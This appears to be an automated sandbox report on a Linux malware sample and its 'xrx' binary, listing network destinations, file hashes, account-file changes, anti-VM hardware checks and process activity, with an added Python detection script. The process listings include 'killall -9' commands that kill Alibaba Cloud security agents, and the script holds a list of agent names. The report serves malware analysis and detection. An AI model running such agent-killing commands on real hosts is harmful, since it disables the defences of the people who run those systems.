IT 185.252.178.82:6972 N/A tcp
IT 185.252.178.82:6972 N/A tcp
CH 179.43.154.189:1010 N/A tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

MD5 41d685bb374b8b9765cc8ad68c6ddd7c
SHA1 4d7f9893b486db574f737fd82f89f1db05d44e4e
SHA256 aa668bd5e23e3f703518eec2e52fffd6275c897ba84ef8a34ef646ac4dde32f4
SHA512 b9d5800641b0fb294d1688faf9dbd0a461a6347f405ab106dc6e2c71a0667c9a39eeb95904a218e5af57683a4f1882876f4ab538aecde442f68265c7467127a0

/var/log/apt/eipp.log.xz

MD5 cc6206f59ec7a64c75f24e79d19c69f7
SHA1 9e5ede07f6b85a9105aa234fa3e78898c3997fb2
SHA256 a961625a91f21ebeed9d5b96cd4063dd72a067d1c41884809f5590573471fad5
SHA512 ce257843f03d72692c7890df5f59943263144314f5fd817bff690458ec26096bb3dec1bd87beb8310580e86618f28282bb1b26366f832ab2eb5ccd8f8ff12c2f

/var/lib/dpkg/updates/tmp.i

MD5 0c83c7b81780508a33c1ea43e49bd0ab
SHA1 1bd385df4de89b74a9e0eaeb42078a3aa13e7a56
SHA256 9c1311fe3442b3427006b95fafa9e55261702b36fbc90b3300e9aca091498dd1
SHA512 97328bd96c405168e5226780a4664f1a6c4406c7b3ec66899d898053346c3e070e7c7cf7e2b659a1781fe5822ec9a6440beb2047e98994977e576562f5d33747

/var/lib/dpkg/tmp.ci/control

MD5 1e0f0dfa728ed7715510e29d0c820cfa
SHA1 9e20884889df0752af14f0afcc0a6bbdb5470c62
SHA256 7263b977924b9c59af6a5ad7da21e3f85d24beb3c4f0d6515ff1eb06fc11af4a
SHA512 41afc8ea626977e98101a9cf492c0d9736f32cc4bb2d0496d2a46769807a01f5282ba00c07141956eea7c364c7b5ce8966b2a891b7dd77d3fdab84b4ccd1f2b2

/var/lib/dpkg/tmp.ci/md5sums

MD5 f0183116fb005f86b0d573c6473fae9b
SHA1 6672eb52c0cb916df1c6924ace41b81264ef0b8b
SHA256 b08ea9d4bf7879ee69d29795219f6958979932f80976133636eecf5d8e9f1272
SHA512 314038597f986c2e1816b865e085014905b92e94d73f08b11a0b560362edb48a335a708617ae310375619752514475c93e48f6a4461e7675206cb5ec884f3a81

/var/lib/dpkg/updates/tmp.i

MD5 6e67dede930df3bc51a5d372940d8c75
SHA1 03a54c296eb9f17c41ea1142f7f2c2c70d715e20
SHA256 087c445cd41888ce3da908be88a19b2bec608e999d92cf006a2aaaebf9452bde
SHA512 28867ada88b421d70616002150c5e91bbd402907365932f9b1a47e3a36233a4f16791e457ff7e1a59eaced3c4bf16626675b6d6e282a50fd9b94397b1126077b

/var/lib/dpkg/updates/tmp.i

MD5 34eb56f174133f283fdc94da47b268f3
SHA1 c68b6ee72b7027222df4bed6b2fba79a3c56b670
SHA256 ad6b382be033c06573cc513c010fe8b7f6be7d43194923bf5e488ed093b8fd83
SHA512 f5195388268211b15e3c27583138d541ec581cb8e3ccea4c26f40cace1a06826cf2997603bddac110e935f84453ca33af08c048d7be76951d9543f41ede2574d

/var/lib/dpkg/updates/tmp.i

MD5 05ffb6efd8d30243a913f95453c376ab
SHA1 d3b05c42a5c9db40d2f375f40764cc2c81e14fcc
SHA256 78b6c50455d3659bb7effbb14312d8eeea86c3a248d0a497e43cf4d6d7ea0be3
SHA512 4c008f42d41d0b150c70593bc9d30152b3738f3341a73d4d3ec1ec8c3e4194b0a633efc1a8570fbdbd29032c323686a58d8d2fc9c922e49d3c399db0c5e9f98b

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 fda2311561ddfd0654505fa2cf369d91
SHA1 2a1be09d3084d3e2ff26e6048f4176af376b1a76
SHA256 0675b27fe2f05cf66d498e5ec5bb6f975aed807cf55440c03bb50a6800435500
SHA512 bef483a282d05f4bee4d3f0c353588cf03e1e7db8fcb9149c1c769a30bf1d247fd74c77485fa630317eff8c4dc6dc114319fdd7526e527e6f755ddb3e1e71e4c

/var/cache/man/2486

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 fc66f74346fb6e7b8d5593e437ceb6f3
SHA1 f35dc1b6a2457ea70067c1a5e48c10ba22fce953
SHA256 e26fb022c7efc9ae568e73e8b1f2034680d977bc2af726d50ce79a69ee0ad3a9
SHA512 68949144614c196d0d1bb9a94be6aa95670080115bcdb1253d1e66fdfd8244dbeda32c6dda2c8850275fc9382da452df58aafae1c2d5f8bbb0803ce1e7d3c425

/var/lib/update-notifier/tmp.ze42Od3Syf

MD5 9e4474dd78060139ab355ed18427f88e
SHA1 e4608e740783b34ab9917ce0a4f379a9c760e725
SHA256 6e285b096a5771d3f0f75b00ea3ce4df1fa1648b6f6ba2311bd8eb5e0c90c708
SHA512 777cad103870948f8109488fe8c02a2ef616aca87319c446d305bb6ddcc01093266bcf78d1e76871937bde94e175a72b574985b33f693e7e0e542b9ed9f87706

/etc/passwd+

MD5 cea58ef2a54a8678646f9398f140d2de
SHA1 46ab8bcd243efa9c87b3859cd342f683f168e133
SHA256 ec0d3574508143d89a5ca35fcc9fe9ae0b0a1a6b0d89f47cbe17ac1d9d88072a
SHA512 9d6879919c7aeb654b27bd67292ebd5e5799cf184d5b45e4debb2d2d8666aebd1e078bfaed7cdb360d0e79a69f01aae009ff5867bf1688389e373de422177d74

/etc/shadow+

MD5 d7f0864275277cd007532a69de0bb969
SHA1 3eba640a166a326b34d0175c51edd6eba33f9460
SHA256 e563dcb02ff3f853d10b7859b126d1705f2e27df89556662a2931a18b8d3bafd
SHA512 e8a0f76dcc12c5e4147832774e6e7c0cda09f231057cb0e80233c7927146a7ba0ff0b18363c6e50a57059235d4384348486377ad53776cf7c7f5b6b0a4ef76f6

/etc/shadow+

MD5 58b187fc10137fd5ca7a8b4a724300ee
SHA1 5394e98da4b5a2aef6fc4e05f40e0203a4805439
SHA256 c4c5fe11e6ad6a9f24716c33e561763192c9c8b1c7fa81494898529d6e4f4855
SHA512 b41dc0d6e8732f7a24eea077331d22c3875168ca20f2243569a2893be7cca5061537a2484f1097f4cc148cd9e8b03004513714b970ccc92e8f5c401e743009ac

/etc/passwd+

MD5 1a2923599c03f2da0e70bc13fc7d2fcb
SHA1 7c850050beffefcd03cee16c3f74cbe63c7f9680
SHA256 bbe8f1dd9974aba408b38e18b0628341bbec08f2493973ff9b6446fa03701823
SHA512 5d8f456ad7bd9a9e4bbf677b03665ee22f1ed9479ea1fbceb004e97dbcdd9a84248c32e017b786fede7baf037c2249078e2e24bc38215d8d4f099f773494fa80

/etc/shadow+

MD5 cebff192afb08821d19a25039edc6af3
SHA1 da79d671c4d01bf02e22ce0b06c4567e1326d367
SHA256 459b3d9ebe3dc0123f0f90f99cb72485f24944f1011aaa5669686e5eb1312e3f
SHA512 6f942dab13165ddb94587c5e3887e6e77dee598fbd7159bad31690d62766c239493d93bab6fcea29f0c6c56ae81029b4f7cd5bdead79225b2ed244a1b35e9a5f

/etc/group+

MD5 b43bcab2b519b1f1d699ab5c9dc418eb
SHA1 e983ed6f5c31b3706b9d3eaf5efdcfe932d653bc
SHA256 4f94732b04d039e70819b986801ab8bb50cc056284e4b4536d46beca0f546f43
SHA512 87999a80f6d7eee4761fd0bb4948235a3133354916ee9ccb8c30eef97a895245959c3bbc7574afbea2f5071194743c15526a7d627d6e2e3edd6ff31a3bf059e9

/etc/gshadow+

MD5 9452ee212552c9f49ebca01b6291a740
SHA1 85e33b01e1d041ad6809067ed50b1770c9be478f
SHA256 363cd5c14472d9750701c768b7657d191e8e76b899b83aca2366ec6c82481669
SHA512 0427539b0dc8fd4c62a0389062a9868615f8cdd21ef4f248dc84ce999f647936b95492377e8655ad903addda37f4c8edea09a1ffdd2e7c014825e62fbfd68f7a

/etc/subuid+

MD5 4641942396624780f617210b1c564db9
SHA1 5f87f6066aed9fdc0cc1a907a397ba383731ac57
SHA256 6ed2c35ec029779fb7f08108345965c99c171908cd125934943dfc6c9a17d32e
SHA512 dccd0d158d875f145746c5efa7b1e87f458d4f1d1b91391958cb6e669ad2f8060c49bef46d79af62b521b02c4d10e8e4e50b4245bed539284eed580b3e3d23ca

/etc/group+

MD5 84eb5d846ee7bfef527db974a5feb1b2
SHA1 e811387fb348ab546f82d60d66a0c9a9c9735d36
SHA256 c11f30bbdc83688d1329289c0f5324e9aa0b0b81365eb6375b953103a2c43456
SHA512 f1fbc838ce695cb448038b8732fb054fd6f5502b6203377eb339e5bcbb8eb877c4f8c10ba5c30591eab82de3603c0a228243dfda7611eff3ae14d9813d69a25b

/etc/gshadow+

MD5 5c0e7d545ff1cfa0ba68f27349507a87
SHA1 0aa5fc2c5a8e1be03ce1bf2b4e68b82de1eb8d47
SHA256 0e4b06466a4c58fbf83afd9939466b7c2a461c27ee876cbec97afae04e53e44b
SHA512 2913398db0dcd7d719c1b455d6d62797f042f99fe8653b97bd36d3354d659d05e400b8d3729254ec793ed37876d0045628f9bd26ba566e1a4bb86c3df39b1954

/etc/shadow+

MD5 af71400bbb59d689a6d8ca145ee6a868
SHA1 6e12abb9495328fc5e424edf26998397382cd5bb
SHA256 37482af0ac86aab195e1cc081ef8ed740ea79573baf8ee14b5d80a5048367e6a
SHA512 197fc4c72429864863c9bbb6581af2f31cb5653b279c347affdace02e3668e3582f94a157a7c9ad95846e84cc8c65fde383e9d9dbd9e59ab7fb6f564d3667fea

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/168/stat /usr/bin/killall N/A
File opened for reading /proc/163/stat /usr/bin/killall N/A
File opened for reading /proc/980/cmdline /usr/bin/killall N/A
File opened for reading /proc/1287/stat /usr/bin/killall N/A
File opened for reading /proc/1074/stat /usr/bin/killall N/A
File opened for reading /proc/1050/stat /usr/bin/killall N/A
File opened for reading /proc/515/stat /usr/bin/killall N/A
File opened for reading /proc/1050/stat /usr/bin/killall N/A
File opened for reading /proc/409/cmdline /usr/bin/killall N/A
File opened for reading /proc/159/stat /usr/bin/killall N/A
File opened for reading /proc/980/stat /usr/bin/killall N/A
File opened for reading /proc/115/stat /usr/bin/killall N/A
File opened for reading /proc/318/stat /usr/bin/killall N/A
File opened for reading /proc/1123/stat /usr/bin/killall N/A
File opened for reading /proc/1012/stat /usr/bin/killall N/A
File opened for reading /proc/988/cmdline /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/409/cmdline /usr/bin/killall N/A
File opened for reading /proc/742/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/323/stat /usr/bin/killall N/A
File opened for reading /proc/689/stat /usr/bin/killall N/A
File opened for reading /proc/1329/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/160/stat /usr/bin/killall N/A
File opened for reading /proc/953/stat /usr/bin/killall N/A
File opened for reading /proc/1464/stat /usr/bin/killall N/A
File opened for reading /proc/79/cmdline /usr/bin/killall N/A
File opened for reading /proc/754/cmdline /usr/bin/killall N/A
File opened for reading /proc/635/cmdline /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/98/stat /usr/bin/killall N/A
File opened for reading /proc/1061/stat /usr/bin/killall N/A
File opened for reading /proc/1157/stat /usr/bin/killall N/A
File opened for reading /proc/1243/cmdline /usr/bin/killall N/A
File opened for reading /proc/1115/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/1273/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/1142/cmdline /usr/bin/killall N/A
File opened for reading /proc/667/stat /usr/bin/killall N/A
File opened for reading /proc/1178/cmdline /usr/bin/killall N/A
File opened for reading /proc/318/cmdline /usr/bin/killall N/A
File opened for reading /proc/1078/stat /usr/bin/killall N/A
File opened for reading /proc/583/cmdline /usr/bin/killall N/A
File opened for reading /proc/173/stat /usr/bin/killall N/A
File opened for reading /proc/323/stat /usr/bin/killall N/A
File opened for reading /proc/1366/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/1489/cmdline /usr/bin/killall N/A
File opened for reading /proc/1054/stat /usr/bin/killall N/A
File opened for reading /proc/408/stat /usr/bin/killall N/A
File opened for reading /proc/1115/stat /usr/bin/killall N/A
File opened for reading /proc/1127/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
GB 185.125.188.61:443 N/A tcp
GB 185.125.188.61:443 N/A tcp
US 151.101.65.91:443 N/A tcp
US 151.101.65.91:443 N/A tcp
GB 195.181.164.19:443 N/A tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.9:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/133/cmdline /usr/bin/killall N/A
File opened for reading /proc/591/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/646/cmdline /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/600/stat /usr/bin/killall N/A
File opened for reading /proc/107/cmdline /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/261/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/640/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/133/cmdline /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/96/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/663/stat /usr/bin/killall N/A
File opened for reading /proc/666/stat /usr/bin/killall N/A
File opened for reading /proc/343/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/290/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/290/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/261/stat /usr/bin/killall N/A
File opened for reading /proc/673/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/183/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/290/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/292/stat /usr/bin/killall N/A
File opened for reading /proc/591/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/300/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/265/stat /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/292/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/639/cmdline /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/673/stat /usr/bin/killall N/A
File opened for reading /proc/300/stat /usr/bin/killall N/A
File opened for reading /proc/183/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/646/stat /usr/bin/killall N/A
File opened for reading /proc/640/cmdline /usr/bin/killall N/A
File opened for reading /proc/107/cmdline /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/673/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsel-20240611-en

Max time kernel

3s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/679/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/150/stat /usr/bin/killall N/A
File opened for reading /proc/693/cmdline /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/694/cmdline /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/699/cmdline /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/727/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/210/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/727/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/117/cmdline /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/116/stat /usr/bin/killall N/A
File opened for reading /proc/341/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/117/stat /usr/bin/killall N/A
File opened for reading /proc/314/stat /usr/bin/killall N/A
File opened for reading /proc/366/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/693/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/106/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/377/stat /usr/bin/killall N/A
File opened for reading /proc/693/stat /usr/bin/killall N/A
File opened for reading /proc/694/stat /usr/bin/killall N/A
File opened for reading /proc/693/cmdline /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/717/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/693/cmdline /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/693/stat /usr/bin/killall N/A
File opened for reading /proc/694/cmdline /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/694/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/106/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/666/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]
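
behavioral9, behavioral25 and behavioral27 all open the same way: after a distribution check (grep Gentoo, cat /etc/issue, lsb_release -a) the script sends SIGKILL to the Alibaba Cloud Security agent processes aegis_cli, aegis_update, AliYunDun, AliHids, AliHips and AliYunDunUpdate, which is why the sandbox records killall walking /proc/*/stat and /proc/*/cmdline. The following is an added example, not code from the report or the sample: it parses the Processes listing format this page uses (an executable path on one line, its argv in square brackets on the next) and flags killall/pkill/kill invocations whose target is a known security-agent name, the way a detection rule over process-creation events would. The listing excerpt is copied from behavioral27 plus one pkill -STOP line from the first analysis; the agent name set (the six Aliyun names from this page plus a few assumed EDR names), the signal map and the function names are assumptions.

```python
import re

# Process names whose forced termination indicates security-agent tampering.
# The aegis_*/Ali* names are from this report; the rest are an assumed extension.
AGENT_PROCESSES = {
    "aegis_cli", "aegis_update", "AliYunDun", "AliHids", "AliHips", "AliYunDunUpdate",
    "falcon-sensor", "osqueryd", "auditd", "wazuh-agentd",
}

# Numeric signals seen with these tools, mapped to names (assumed subset).
SIGNAL_NAMES = {"9": "KILL", "15": "TERM", "19": "STOP"}

# Excerpt in the page's own format: behavioral27 plus one pkill line from the first listing.
LISTING = """/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/pkill

[pkill -STOP xmu]
"""

ARGV_LINE = re.compile(r"^\[(.*)\]$")


def parse_listing(text):
    """Return (exe_path, argv) pairs from the report's path / [argv] line format.

    The report has already stripped shell quoting, so argv is split on whitespace.
    """
    events, exe = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ARGV_LINE.match(line)
        if m and exe is not None:
            events.append((exe, m.group(1).split()))
            exe = None
        else:
            exe = line
    return events


def normalise_signal(flag):
    """'-9' -> 'KILL', '-STOP' -> 'STOP', '-SIGTERM' -> 'TERM'."""
    sig = flag.lstrip("-").upper()
    if sig.startswith("SIG"):
        sig = sig[3:]
    return SIGNAL_NAMES.get(sig, sig)


def kill_events(events):
    """(tool, signal, target) for every killall/pkill/kill invocation in the events.

    Only bare signal flags are understood, which is all these listings use;
    option flags that take a value (e.g. pkill -u) are not modelled (assumption).
    """
    out = []
    for exe, argv in events:
        tool = exe.rsplit("/", 1)[-1]
        if tool not in ("killall", "pkill", "kill") or len(argv) < 2:
            continue
        signal = "TERM"  # default for all three tools
        targets = []
        for tok in argv[1:]:
            if tok.startswith("-") and len(tok) > 1:
                signal = normalise_signal(tok)
            else:
                targets.append(tok)
        out.extend((tool, signal, t) for t in targets)
    return out


def agent_tampering(events):
    """Kill events aimed at a known security-agent process name."""
    return [e for e in kill_events(events) if e[2] in AGENT_PROCESSES]


if __name__ == "__main__":
    for tool, sig, target in agent_tampering(parse_listing(LISTING)):
        print(f"security agent targeted: {tool} -{sig} {target}")
```

On a real host the same logic runs over auditd execve records or eBPF process events rather than a pasted listing; the decisive fields are the same (basename of the executable, the signal flag, the remaining argv tokens), and the pkill -STOP lines from the first analysis show why the signal must be kept rather than only matching on the tool name.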

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

139s

Command Line

[/tmp/xrx/xrx]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xrx/xrx N/A

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xrx/xrx N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/xrx/xrx N/A

Reads CPU attributes

discovery
Description Indicator Process Target
